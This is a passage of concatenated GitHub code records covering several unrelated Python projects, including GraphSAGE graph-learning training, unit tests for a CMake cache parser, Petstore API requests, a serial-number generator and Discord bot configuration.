dense_layer(feats, pts, knn_idx)\n feats = new_feats\n return feats\n\n\nclass Transition(nn.Module):\n def __init__(self, args):\n super(Transition, self).__init__()\n\n input_dim = args.feat_dim + args.layer_num * args.growth_rate\n self.trans = nn.Sequential(\n nn.Conv1d(input_dim, args.feat_dim, 1),\n nn.BatchNorm1d(args.feat_dim),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, feats):\n # input: (b, c, n)\n\n new_feats = self.trans(feats)\n return new_feats\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, args):\n super(FeatureExtractor, self).__init__()\n\n self.k = args.k\n self.conv_init = nn.Sequential(\n nn.Conv1d(3, args.feat_dim, 1),\n nn.BatchNorm1d(args.feat_dim),\n nn.ReLU(inplace=True)\n )\n self.dense_blocks = nn.ModuleList([])\n for i in range(args.block_num):\n self.dense_blocks.append(nn.ModuleList([\n DenseUnit(args),\n Transition(args)\n ]))\n\n def forward(self, pts):\n # input: (b, 3, n)\n\n # get knn_idx: (b, n, 3)\n pts_trans = rearrange(pts, 'b c n -> b n c').contiguous()\n # (b, m, k)\n knn_idx = pointops.knnquery_heap(self.k, pts_trans, pts_trans).long()\n # (b, c, n)\n init_feats = self.conv_init(pts)\n local_feats = []\n local_feats.append(init_feats)\n # local features\n for dense_block, trans in self.dense_blocks:\n new_feats = dense_block(init_feats, pts, knn_idx)\n new_feats = trans(new_feats)\n init_feats = new_feats\n local_feats.append(init_feats)\n # global features: (b, c)\n global_feats = init_feats.max(dim=-1)[0]\n return global_feats, local_feats\n","repo_name":"yunhe20/Grad-PU","sub_path":"models/FeatureExtractor.py","file_name":"FeatureExtractor.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"34"} +{"seq_id":"18233770360","text":"from drawing import Drawing\r\nfrom factory import PickerFactory\r\nfrom randomPicker import RandomPicker\r\n\r\n\r\nif __name__ == \"__main__\":\r\n d = {\"picksPerDrawing\": 5, \"altReds\": False}\r\n\r\n # Test creating pickers\r\n\r\n\r\n # Test factory\r\n pf = PickerFactory()\r\n print(pf)\r\n rp = pf.CreatePicker(\"RandomPicker\", **d)\r\n print(rp)\r\n rp.Pick(None)\r\n for draw in rp.GetPicks():\r\n print(draw)","repo_name":"Dreamcatcher5/Powerball","sub_path":"src/picker/pickerTest.py","file_name":"pickerTest.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17054205322","text":"from unittest import TestCase\nfrom cmake_row import cmake_row, row_type\n\nclass test_cmake_row(TestCase):\n commentline = \"\"\n filepath_var_valid = \"CMAKE_ADDR2LINE:FILEPATH=/usr/bin/addr2line\"\n noname_var = \":FILEPATH=/usr/bin/addr2line\"\n notype_var = \"CMAKE_ADDR2LINE:=/usr/bin/addr2line\"\n bool_var = \"CMAKE_ADDR2LINE:BOOL=ON\"\n\n def test_row_creation(self):\n var_name = \"CMAKE_ADDR2LINE\"\n row = cmake_row(self.filepath_var_valid, 0)\n with self.subTest():\n self.assertEqual(row.name, var_name)\n with self.subTest():\n self.assertEqual(row.row_type, row_type.VARIABLE)\n with self.subTest():\n self.assertEqual(row.get_val(), \"/usr/bin/addr2line\")\n with self.subTest():\n self.assertEqual(row.row_number, 0)\n\n def test_slash_comment_row(self):\n row = cmake_row(\"//\" + self.filepath_var_valid, 0)\n with self.subTest():\n self.assertEqual(row.row_type, row_type.SLASH_COMMENT)\n with self.subTest():\n self.assertEqual(row.serialize(), \"//\" + self.filepath_var_valid)\n\n def test_pound_comment_row(self):\n row = cmake_row(\"#\" + self.filepath_var_valid, 0)\n with self.subTest():\n self.assertEqual(row.row_type, row_type.POUND_COMMENT)\n with self.subTest():\n self.assertEqual(row.serialize(), \"#\" + self.filepath_var_valid)\n\n def test_noname_row(self):\n self.assertRaises(ValueError, cmake_row, self.noname_var, 0)\n\n def test_empty_line(self):\n row = cmake_row(\"\", 0)\n self.assertEqual(row.row_type, row_type.EMPTY)\n\n def test_notype_row(self):\n self.assertRaises(ValueError, cmake_row, self.notype_var, 0)\n\n def test_bool_row(self):\n \"\"\"\n we use assertEqual instead of assertTrue to avoid false positives with\n casting any other value to bool.\n \"\"\"\n row = cmake_row(self.bool_var, 0)\n with self.subTest():\n self.assertEqual(row.val.value, True)\n with self.subTest():\n self.assertEqual(row.serialize(), self.bool_var)\n\n def test_emtpy_row(self):\n row = cmake_row(\"\", 0)\n self.assertEqual(\"\", row.serialize())\n","repo_name":"vvaltchev/tilck","sub_path":"scripts/configurator/parser/test_cmakerow.py","file_name":"test_cmakerow.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":2169,"dataset":"github-code","pt":"34"} +{"seq_id":"43890944500","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom torch.autograd import Variable\n\nimport numpy as np\nimport time\nimport random\nfrom sklearn.metrics import f1_score, precision_score, recall_score\nfrom collections import defaultdict\n\nfrom encoders import Encoder\nfrom aggregators import MeanAggregator\n\"\"\"\nSimple supervised GraphSAGE model as well as examples running the model\non the Cora and Pubmed datasets.\n\"\"\"\nimport os\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n# torch.cuda.set_device(0)\n\nclass SupervisedGraphSage(nn.Module):\n def __init__(self, num_classes, enc):\n super(SupervisedGraphSage, self).__init__()\n self.enc = enc\n self.xent = nn.CrossEntropyLoss()\n\n self.weight = nn.Parameter(\n torch.FloatTensor(num_classes, enc.embed_dim))\n init.xavier_uniform(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds)\n return scores.t()\n\n def loss(self, nodes, labels):\n scores = self.forward(nodes)\n return self.xent(scores, labels.squeeze())\n\n\nclass UnsupervisedGraphSage(nn.Module):\n def __init__(self, num_classes, enc):\n super(UnsupervisedGraphSage, self).__init__()\n self.enc = enc\n # self.xent = nn.CrossEntropyLoss()\n\n self.weight = nn.Parameter(\n torch.FloatTensor(num_classes, enc.embed_dim))\n init.xavier_uniform(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds)\n return scores.t()\n\n def loss(self, nodes, num_neg=5):\n scores = self.enc(nodes)\n pos_sample = self.enc.pos_sample(nodes)\n pos_embed = self.enc(pos_sample)\n\n neg_sample = self.enc.neg_sample(nodes, num_neg)\n neg_embed = [self.enc(neg_sample[i]) for i in range(num_neg)]\n\n loss_pos = torch.diag(-torch.log(torch.sigmoid(scores.t().mm(pos_embed))))\n\n loss_neg = sum([torch.diag(-torch.log(torch.sigmoid(-scores.t().mm(neg_embed[i])))) for i in range(num_neg)]) / len(nodes)\n # print(loss_pos.shape, loss_pos.mean().item(), loss_neg.shape, loss_neg.mean().item())\n loss_batch = torch.mean(loss_pos + loss_neg)\n return loss_batch\n\n\nclass UnsupervisedGraphSageCls(nn.Module):\n def __init__(self, num_classes, enc):\n super(UnsupervisedGraphSageCls, self).__init__()\n self.enc = enc\n self.xent = nn.CrossEntropyLoss()\n self.weight = nn.Parameter(\n torch.FloatTensor(num_classes, enc.embed_dim))\n init.xavier_uniform(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds)\n return scores.t()\n\n def loss(self, nodes, labels):\n scores = self.forward(nodes)\n return self.xent(scores, labels.squeeze()), scores\n\n\ndef load_cora():\n num_nodes = 2708\n num_feats = 1433\n feat_data = np.zeros((num_nodes, num_feats))\n labels = np.empty((num_nodes, 1), dtype=np.int64)\n node_map = {}\n label_map = {}\n with open(\"../cora/cora.content\") as fp:\n for i, line in enumerate(fp):\n info = line.strip().split()\n #feat_data[i,:] = map(float, info[1:-1])\n feat_data[i, :] = [float(x) for x in info[1:-1]]\n\n node_map[info[0]] = i\n if not info[-1] in label_map:\n label_map[info[-1]] = len(label_map)\n labels[i] = label_map[info[-1]]\n\n adj_lists = defaultdict(set)\n with open(\"../cora/cora.cites\") as fp:\n for i, line in enumerate(fp):\n info = line.strip().split()\n paper1 = node_map[info[0]]\n paper2 = node_map[info[1]]\n adj_lists[paper1].add(paper2)\n adj_lists[paper2].add(paper1)\n return feat_data, labels, adj_lists\n\n\ndef un_cora(model_d=128, cuda=False):\n np.random.seed(233)\n random.seed(233)\n num_nodes = 2708\n feat_data, labels, adj_lists = load_cora()\n features = nn.Embedding(2708, 1433)\n features.weight = nn.Parameter(torch.FloatTensor(feat_data),\n requires_grad=False)\n if cuda:\n features.cuda()\n\n agg1 = MeanAggregator(features, cuda=cuda)\n enc1 = Encoder(features, 1433, model_d, adj_lists, agg1, gcn=False, cuda=cuda)\n agg2 = MeanAggregator(lambda nodes: enc1(nodes).t(), cuda=cuda)\n enc2 = Encoder(lambda nodes: enc1(nodes).t(),\n enc1.embed_dim,\n 128,\n adj_lists,\n agg2,\n base_model=enc1,\n gcn=False,\n cuda=cuda)\n enc1.num_samples = 5\n enc2.num_samples = 5\n\n graphsage = UnsupervisedGraphSage(7, enc2)\n if cuda:\n graphsage.cuda()\n rand_indices = np.random.permutation(num_nodes)\n # test = rand_indices[:1000]\n test_size = 1000\n train_size = num_nodes\n val = rand_indices[:test_size]\n train = list(rand_indices[test_size:])\n\n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad,\n graphsage.parameters()),\n lr=0.05)\n times = []\n\n epoch_num = 20\n batch_size = 512\n for batch in range(epoch_num * int(train_size / batch_size)):\n # batch_size\n\n batch_nodes = train[:batch_size]\n # shuffle:random list on itself return none\n random.shuffle(train)\n \n start_time = time.time()\n # set all gradient to be 0\n optimizer.zero_grad()\n # loss 包含 forward\n loss = graphsage.loss(\n batch_nodes)\n\n loss.backward()\n # refresh params' gradient\n optimizer.step()\n\n end_time = time.time()\n times.append(end_time - start_time)\n print('[%f / %d]' % (float(batch / int(train_size / batch_size)), epoch_num), 'batch:', batch, 'loss:', loss.item())\n\n print('############ Training Classification ##########')\n cls_model = UnsupervisedGraphSageCls(7, enc2)\n cls_optimizer = torch.optim.Adam([cls_model.weight], lr=0.005)\n cls_epoch_num = 200\n for batch in range(cls_epoch_num * int(train_size / batch_size)):\n # batch_size\n batch_nodes = train[:batch_size]\n # shuffle:random list on itself return none\n random.shuffle(train)\n start_time = time.time()\n # set all gradient to be 0\n cls_optimizer.zero_grad()\n # loss 包含 forward\n loss, scores = cls_model.loss(\n batch_nodes,\n Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n\n loss.backward()\n # refresh params' gradient\n cls_optimizer.step()\n\n end_time = time.time()\n times.append(end_time - start_time)\n if batch % 10 == 0:\n print('[%f / %d]' % (float(batch / int(train_size / batch_size)), cls_epoch_num), 'batch:', batch,\n 'loss:', loss.item())\n val_output = cls_model.forward(val)\n print(\n \"Validation F1:\",\n f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\"))\n\n val_output = cls_model.forward(val)\n print(\n \"Validation F1:\",\n f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\"))\n print(\"Average batch time:\", np.mean(times))\n 1\n return f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\")\n\n\ndef run_cora():\n np.random.seed(233)\n random.seed(233)\n num_nodes = 2708\n feat_data, labels, adj_lists = load_cora()\n features = nn.Embedding(2708, 1433)\n features.weight = nn.Parameter(torch.FloatTensor(feat_data),\n requires_grad=False)\n # features.cuda()\n\n agg1 = MeanAggregator(features, cuda=False)\n enc1 = Encoder(features, 1433, 128, adj_lists, agg1, gcn=False, cuda=False)\n agg2 = MeanAggregator(lambda nodes: enc1(nodes).t(), cuda=False)\n enc2 = Encoder(lambda nodes: enc1(nodes).t(),\n enc1.embed_dim,\n 128,\n adj_lists,\n agg2,\n base_model=enc1,\n gcn=False,\n cuda=False)\n enc1.num_samples = 5\n enc2.num_samples = 5\n\n graphsage = SupervisedGraphSage(7, enc2)\n ungraphsage = UnsupervisedGraphSage(7, enc2)\n # graphsage.cuda()\n rand_indices = np.random.permutation(num_nodes)\n # test = rand_indices[:1000]\n val = rand_indices[:1000]\n train = list(rand_indices[1000:])\n\n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad,\n graphsage.parameters()),\n lr=0.7)\n times = []\n for batch in range(200):\n # batch_size\n batch_nodes = train[:256]\n # shuffle:random list on itself return none\n random.shuffle(train)\n start_time = time.time()\n # set all gradient to be 0\n optimizer.zero_grad()\n # loss 包含 forward\n loss = graphsage.loss(\n batch_nodes,\n Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n\n if batch % 20 == 0:\n loss2 = ungraphsage.loss(batch_nodes)\n print('[{}/{}] Training: cls loss = {}; uns loss = {}'.format(batch, 200, loss, loss2))\n\n loss.backward()\n # refresh params' gradient\n optimizer.step()\n\n end_time = time.time()\n times.append(end_time - start_time)\n # print(batch, loss.item())\n\n val_output = graphsage.forward(val)\n print(\n \"Validation F1:\",\n f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\"))\n print(\"Average batch time:\", np.mean(times))\n 1\n return f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\")\n\n\ndef load_pubmed():\n #hardcoded for simplicity...\n num_nodes = 19717\n num_feats = 500\n feat_data = np.zeros((num_nodes, num_feats))\n labels = np.empty((num_nodes, 1), dtype=np.int64)\n node_map = {}\n with open(\"../pubmed-data/Pubmed-Diabetes.NODE.paper.tab\") as fp:\n fp.readline()\n feat_map = {\n entry.split(\":\")[1]: i - 1\n for i, entry in enumerate(fp.readline().split(\"\\t\"))\n }\n for i, line in enumerate(fp):\n info = line.split(\"\\t\")\n node_map[info[0]] = i\n labels[i] = int(info[1].split(\"=\")[1]) - 1\n for word_info in info[2:-1]:\n word_info = word_info.split(\"=\")\n feat_data[i][feat_map[word_info[0]]] = float(word_info[1])\n adj_lists = defaultdict(set)\n with open(\"../pubmed-data/Pubmed-Diabetes.DIRECTED.cites.tab\") as fp:\n fp.readline()\n fp.readline()\n for line in fp:\n info = line.strip().split(\"\\t\")\n paper1 = node_map[info[1].split(\":\")[1]]\n paper2 = node_map[info[-1].split(\":\")[1]]\n adj_lists[paper1].add(paper2)\n adj_lists[paper2].add(paper1)\n return feat_data, labels, adj_lists\n\n\ndef run_pubmed():\n np.random.seed(233)\n random.seed(233)\n num_nodes = 19717\n feat_data, labels, adj_lists = load_pubmed()\n features = nn.Embedding(19717, 500)\n features.weight = nn.Parameter(torch.FloatTensor(feat_data),\n requires_grad=False)\n # features.cuda()\n\n agg1 = MeanAggregator(features, cuda=True)\n enc1 = Encoder(features, 500, 128, adj_lists, agg1, gcn=True, cuda=False)\n agg2 = MeanAggregator(lambda nodes: enc1(nodes).t(), cuda=False)\n enc2 = Encoder(lambda nodes: enc1(nodes).t(),\n enc1.embed_dim,\n 128,\n adj_lists,\n agg2,\n base_model=enc1,\n gcn=True,\n cuda=False)\n enc1.num_samples = 10\n enc2.num_samples = 25\n\n graphsage = SupervisedGraphSage(3, enc2)\n # graphsage.cuda()\n rand_indices = np.random.permutation(num_nodes)\n # test = rand_indices[:1000]\n val = rand_indices[:4000]\n train = list(rand_indices[4000:])\n\n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad,\n graphsage.parameters()),\n lr=0.7)\n times = []\n for batch in range(200):\n batch_nodes = train[:1024]\n random.shuffle(train)\n start_time = time.time()\n optimizer.zero_grad()\n loss = graphsage.loss(\n batch_nodes,\n Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n loss.backward()\n optimizer.step()\n end_time = time.time()\n times.append(end_time - start_time)\n # print(batch, loss.item())\n\n val_output = graphsage.forward(val)\n # print(\n # \"Validation F1:\",\n # f1_score(labels[val],\n # val_output.data.numpy().argmax(axis=1),\n # average=\"micro\"))\n # print(\"Average batch time:\", np.mean(times))\n\n\nif __name__ == \"__main__\":\n un_cora()\n # run_cora()\n # f, a = 0, 0\n # for i in range(10):\n # ret = run_cora()\n # # f = max(f, ret[0])\n # # a = max(a, ret[1])\n # print(i, ret)\n # print(f, a)\n","repo_name":"wizardxxx7/graphsage_unsupervise","sub_path":"graphsage/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12700819613","text":"# Projekt: Seriennummergenerator \\ Modul: serialnumbergenerator\n# Author: Ali Abas Arsalahn\n# Datum: 12.03.2022\n\"\"\"Serialnumbergenerator module\"\"\"\n\nfrom io import UnsupportedOperation\nfrom random import randrange\nfrom string import ascii_letters, digits\nimport json\n\n\nclass SerialnumberGenerator():\n \"\"\"Methods: generate_serialnumber, save_serialnumber, validate_serialnumber.\"\"\"\n\n def __init__(self) -> None:\n self.sn_map = {\"keys\": {}}\n\n def generate_serialnumber(self, sn_type: str, count: int, key_rows: int, row_length: int) -> None:\n \"\"\"Generates a Serialnumber based on type.\n Takes quantity, rows and row_length as Argmuments\"\"\"\n\n def generate_letter() -> str:\n \"\"\"returns a random letter.\"\"\"\n rnd_nmb = randrange(len(ascii_letters) - 1)\n return ascii_letters[rnd_nmb]\n\n def generate_digit() -> str:\n \"\"\"returns a random digit.\"\"\"\n rnd_nmb = randrange((len(digits)) - 1)\n return digits[rnd_nmb]\n\n def generate_string(sn_type: str, count: int, rows: int, row_length: int, tmp_list: list) -> list:\n \"\"\"\n Generates Serialnumbers based on type.\n Returns created serialnumbers as item in a list.\n \"\"\"\n key = ''\n for i in range(rows * row_length):\n key += generate_letter() if sn_type == 'letter' else generate_digit()\n\n tmp_list.append(key)\n if count <= 1:\n return tmp_list\n else:\n return generate_string(sn_type, (count - 1), rows, row_length, tmp_list)\n\n tmp_list = []\n end_list = generate_string(\n sn_type, count, key_rows, row_length, tmp_list)\n for key in end_list:\n self.sn_map[\"keys\"][key] = True\n\n def validate_serialnumber(self, validate_serialnumber: str, directory: str, load_filename: str) -> None:\n \"\"\"Takes a string as an argument and checks if it is valid a valid serialnumber.\"\"\"\n with open(directory + f\"/{load_filename}\", 'r', encoding=\"utf_8\") as file:\n data = json.load(file)\n try:\n if data[\"keys\"][validate_serialnumber]:\n print(\"key is valid!\")\n else:\n print(\"key is not valid\")\n except KeyError:\n print(\"key not found!\")\n\n def save_serialnumber(self, save_directory: str, save_filename: str) -> None:\n \"\"\"writes existing keys to a json file.\"\"\"\n try:\n with open(save_directory + f\"/{save_filename}\", \"r\", encoding=\"utf-8\") as file:\n data = json.load(file)\n for serialnumber in self.sn_map[\"keys\"]:\n data[\"keys\"][serialnumber] = True\n with open((save_directory + f\"/{save_filename}\"), \"r+\", encoding=\"utf-8\") as file:\n json.dump(data, file, indent=4)\n except (UnsupportedOperation, FileNotFoundError, json.decoder.JSONDecodeError):\n with open((save_directory + f\"/{save_filename}\"), \"w\", encoding=\"utf-8\") as file:\n json.dump(self.sn_map, file, indent=4)\n","repo_name":"JoshuaSchumacherGER/Python_Loesungen","sub_path":"P1/1/serialnumbergenerator.py","file_name":"serialnumbergenerator.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"22889342470","text":"from building import *\nimport rtconfig\n\ncwd = GetCurrentDir()\nsrc = Glob('*.c')\nCPPPATH = [cwd]\nLOCAL_CCFLAGS = ''\n\nif GetDepend(['GPS_RMC_USING_SAMPLE']):\n src += Glob('example/rtt_gps_rmc_example.c')\n\ngroup = DefineGroup('gps_rmc', src, depend = ['PKG_USING_GPS_RMC'], CPPPATH = CPPPATH, LOCAL_CCFLAGS = LOCAL_CCFLAGS)\n\nReturn('group')\n","repo_name":"maplerian/gps_rmc","sub_path":"SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"81045068","text":"from actor import Actor\nfrom base import Session\nfrom movie import Movie\nfrom QueryConverter import converter\n\nfrom datetime import date\n\n# 2 - extract a session\nsession = Session()\n\n# 3 - extract all movies\nmovies = session.query(Movie).all()\nmv = converter()._convert_movie(movies)\nimport pdb;pdb.set_trace()\n\n# u need to convert this data to schema type.\n# 4 - print movies' details\nprint('\\n### All movies:')\nfor movie in movies:\n print(f'{movie.title} was released on {movie.release_date}')\nprint('')\n\n# 6 - movies that Dwayne Johnson participated\nthe_rock_movies = session.query(Movie) \\\n .join(Actor, Movie.actors) \\\n .filter(Actor.name == 'Dwayne Johnson') \\\n .all()\n\nprint('### Dwayne Johnson movies:')\nfor movie in the_rock_movies:\n print(f'The Rock starred in {movie.title}')\nprint('')","repo_name":"ZahraHR/API-mini-ptoject","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4758139999","text":"import requests\n\nbase_url = \"https://petstore.swagger.io/v2\"\n\nheaders = {\n \"accept\": \"application/json\"\n}\n\ndata = {\n \"petId\": 6,\n \"additionalMetadata\": \"Some metadata\"\n}\n\n\n# GET запрос\ndef get_request():\n url = f\"{base_url}/pet/findByStatus\"\n response = requests.get(url, headers=headers)\n return response\n\n# POST запрос\ndef post_request(data):\n url = f\"{base_url}/pet\"\n response = requests.post(url, json=data, headers=headers)\n return response\n\n# PUT запрос\ndef put_request(pet_id, data):\n url = f\"{base_url}/pet\"\n response = requests.put(url, json=data, headers=headers)\n return response\n\n# DELETE запрос\ndef delete_request(pet_id):\n url = f\"{base_url}/pet/{pet_id}\"\n response = requests.delete(url, headers=headers)\n return response\n\n# Выполнение запросов и печать ответов\nif __name__ == \"__main__\":\n # Выполнение GET запроса\n get_response = get_request()\n print(\"GET Response:\")\n print(get_response.status_code)\n print(get_response.json())\n print()\n\n # Выполнение POST запроса\n new_pet_data = {\n \"name\": \"Fluffy\",\n \"type\": \"Cat\"\n }\n post_response = post_request(new_pet_data)\n print(\"POST Response:\")\n print(post_response.status_code)\n print(post_response.json())\n print()\n\n # Получение ID нового питомца из POST-ответа\n new_pet_id = post_response.json()[\"id\"]\n\n # Выполнение PUT запроса\n updated_pet_data = {\n \"name\": \"Whiskers\",\n \"type\": \"Cat\"\n }\n put_response = put_request(new_pet_id, updated_pet_data)\n print(\"PUT Response:\")\n print(put_response.status_code)\n print(put_response.json())\n print()\n\n # Выполнение DELETE запроса\n delete_response = delete_request(new_pet_id)\n print(\"DELETE Response:\")\n print(delete_response.status_code)\n print(delete_response.text)\n","repo_name":"Djonsis/Module_19_library_requests_19.3.3","sub_path":"request_API.py","file_name":"request_API.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"69975314019","text":"#! /usr/bin/python3\n\nimport pickle\nimport json\nimport os\n\nfrom collections import Counter\n\nimport utils\nimport corpse\n\ndef load_cl(classifier): #load the classifier from a saved file\n f=open(classifier, \"rb\")\n return(pickle.load(f))\n\ndef score_cdb(tfile, cats, keywords, cl):\n cdb=utils.open_cdb(tfile)\n score, uscore={}, {}\n for key in utils.get_all_keys(cdb):\n if key.endswith(\"desc\"):\n cati=check_categories(cl, cats, json.loads(str(cdb[bytes(key, 'utf-8')], 'utf-8')))\n keywi=check_keywords(keywords, str(cdb[bytes(key, 'utf-8')], 'utf-8'))\n value=int(cati)+keywi\n score[cdb[bytes(key[:-4]+\"url\", 'utf-8')]]=value\n print(\"VAL:\", cati, keywi)\n return(score)\n\ndef ready_directory(directory):\n for place in utils.recursive_scan(\"dict.cdb\", [directory]):\n if place.startswith(\"allwords\"):\n allwords=utils.cdb2dict(place)\n corpse.neo_process_dir(directory, confdir)\n\ndef check_keywords(keywords, descr):\n score=0\n descr=json.loads(descr)\n for word in descr:\n if descr[word] > 1:\n if word in keywords:\n score=score+descr[word]\n return(score)\n\ndef check_categories(cl, cats, descr):\n cat=cl.classify(descr)\n print(cat)\n if str(cat, 'utf-8') in cats:\n print(cats[str(cat, 'utf-8')])\n return(cats[str(cat, 'utf-8')])\n return(0)\n\ndef isopeda(directory, condir):\n score={}\n best=[]\n global allwords\n global confdir\n confdir=condir\n if os.path.isdir(directory) is False:\n os.makedirs(directory)\n cats=load_json(confdir+\"/\"+\"cats.dict\")\n allwords=utils.cdb2dict(confdir+\"/\"+\"allwords.dict.cdb\")\n keywords=load_json(confdir+\"/\"+\"keywords.list\")\n cl=load_cl(confdir+\"/\"+\"classi.class\") \n ready_directory(directory)\n places=utils.recursive_scan(\"desc.cdb\", [directory])\n for place in places:\n score.update(score_cdb(place, cats, keywords, cl))\n print(score)\n\n leaderboard=Counter(score)\n print(leaderboard.most_common(5))\n \ndef load_json(tfile):\n with open(tfile, \"r\") as source:\n return(json.load(source))\n","repo_name":"anneselmo/Isopeda","sub_path":"isopeda.py","file_name":"isopeda.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20882661741","text":"#!/usr/local/bin/python3.5\nimport sys, os\nimport pandas as pd\nfrom scipy.stats import fisher_exact as fe\nfrom statsmodels.sandbox.stats.multicomp import multipletests\n\nprefix = sys.argv[1]\nfreq = float(sys.argv[2])\ndf_bed_paths = sys.argv[3:]\ndf_paths = df_bed_paths[0::2]\nbed_paths = df_bed_paths[1::2]\n\nout_paths = []\nfor i in range(len(df_paths)):\n _ = os.path.basename(df_paths[i])\n _ = _.split(\".\")[0]\n out_paths.append(_)\n\nbeds = []\nfor i in bed_paths:\n beds.append(pd.read_table(i, sep=\"\\t\", names=[\"Region\", \"Start\", \"End\", \"Name\", \"Score\", \"Strand\"]))\n\nvdfs = []\nfor _i,i in enumerate(df_paths):\n _ = pd.read_table(i, names=[\"POS\", \"REF\", \"ALT\", \"AD\", \"REV\", \"DP\", \"QUAL\"], skiprows = 1)\n vdfs.append(_)\n\n# Fisher's Exact Test\n# | AD | DP |\n# Variant | | |\n# Threshold | 3 | 100 |\nfor vdf in vdfs:\n pvals = vdf.apply(lambda x: fe([[x[\"AD\"], x[\"DP\"]], [(freq/100)*x[\"DP\"], x[\"DP\"]]], \"greater\"), axis = 1)\n vdf[\"threshold_\"+str(freq)+\"%_pval\"] = multipletests([i[1] for i in pvals], method=\"fdr_bh\")[1]\n vdf[\"threshold_\"+str(freq)+\"%_oddsratio\"] = [i[0] for i in pvals]\n\nthreshold = freq\ncol = \"threshold_\"+str(threshold)+\"%\"\npval_threshold = 0.05\n_ = vdfs\n# _ = [i[i[col+\"_pval\"]<=pval_threshold] for i in _]\ndf = _[0]\nfor _i, i in enumerate(_[1:]):\n df = df.merge(i, how='inner', on=['POS', 'REF', 'ALT'], suffixes = (\"_0\", \"_\"+str(_i+1)))\n\ncols = df.columns[df.columns.str.match(r\"\\b\"+col+\"\\b*_pval\")]\ndf = df.ix[df[cols].apply(lambda x: any([i<= pval_threshold for i in x]), axis = 1)]\n\nmasked = []\nfor i in range(len(beds)):\n masked.append([])\n\nfor i in df[\"POS\"]:\n for j in range(len(beds)):\n bed = beds[j]\n _ = bed[(bed[\"Start\"] <= i) & (bed[\"End\"] >= i)]\n if _.shape[0] == 1:\n _n = \"_\".join(_[\"Name\"].values[0].split(\"_\")[:-1])\n _ = bed[bed[\"Name\"].str.contains(_n)].sort_values(\"Start\")\n masked[j].extend(_.index.values) # Two primers per amplicon\n\nfor i in range(len(masked)):\n masked[i] = set(masked[i])\n\nfor i in range(len(out_paths)):\n txt = \" \".join([str(j) for j in masked[i]])\n print(txt)\n with open(prefix+out_paths[i]+'_masked_primer_indices.txt', 'w') as f:\n f.write(txt+'\\n')\n","repo_name":"grubaughlab/ivar","sub_path":"scripts/get_masked_amplicons.py","file_name":"get_masked_amplicons.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"15415008005","text":"import csv\nimport os\n\n\nglobal DISCORDCONFIGFILE\nDISCORDCONFIGFILE = 'DISCORDCONFIG.csv'\ndirectory = os.path.dirname(__file__)\nconfigFilepath = os.path.join(directory, DISCORDCONFIGFILE)\n\nglobal TOKENSFILE \nTOKENSFILE = 'TOKENS.csv'\ndirectory = os.path.dirname(__file__)\ntokenFilepath = os.path.join(directory, TOKENSFILE)\n\ndef setRegistrationChannelID():\n \n ID = input('Please enter the channel ID for registering new users: ')\n with open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'registration':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setSoloChannelID():\n \n ID = input('Please enter the channel ID for reporting solo PUBG rounds: ')\n with open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'soloReport':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setDuoChannelID():\n \n ID = input('Please enter the channel ID for reporting duo PUBG rounds: ')\n with open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'duoReport':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setSquadChannelID():\n \n ID = input('Please enter the channel ID for reporting squad PUBG rounds: ')\n with 